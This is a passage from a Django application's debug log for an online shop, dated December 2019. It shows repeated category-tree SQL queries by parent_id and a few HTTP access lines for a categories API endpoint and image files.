"shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 10:36:58,950 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 10:36:58,953 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 10:36:58,956 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 10:36:58,958 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 10:36:58,961 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 10:36:58,963 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 10:36:58,965 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 10:36:58,969 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 10:36:58,971 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 10:36:58,973 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 10:36:58,976 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 10:36:58,978 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 10:36:58,981 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 10:36:58,984 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 10:36:58,986 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 10:36:58,988 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 10:36:58,990 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 10:36:58,994 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 10:36:58,996 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 10:36:58,998 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 10:36:59,001 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 10:36:59,003 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 10:36:59,005 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 10:36:59,009 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 10:36:59,011 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 10:36:59,013 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 10:36:59,016 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 10:36:59,018 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 10:36:59,021 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 10:36:59,024 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 10:36:59,026 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 10:36:59,028 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 10:36:59,031 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 10:36:59,035 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 10:36:59,037 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 10:36:59,039 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 10:36:59,042 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 10:36:59,044 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 10:36:59,046 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 10:36:59,049 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 10:36:59,051 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 10:36:59,053 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 10:36:59,056 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 10:36:59,058 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 10:36:59] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [19/Dec/2019 10:36:59] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 [19/Dec/2019 10:36:59] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 DEBUG 2019-12-19 10:37:49,564 utils 4252 140031482124032 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 10:37:49,570 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 10:37:49,574 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 10:37:49,576 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 10:37:49,579 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 10:37:49,581 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 10:37:49,584 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 10:37:49,586 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 10:37:49,588 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 10:37:49,591 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 10:37:49,594 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 10:37:49,596 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 10:37:49,598 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 10:37:49,600 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 10:37:49,603 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 10:37:49,606 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 10:37:49,608 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 10:37:49,610 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 10:37:49,612 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 10:37:49,616 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 10:37:49,618 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 10:37:49,620 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 10:37:49,622 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", 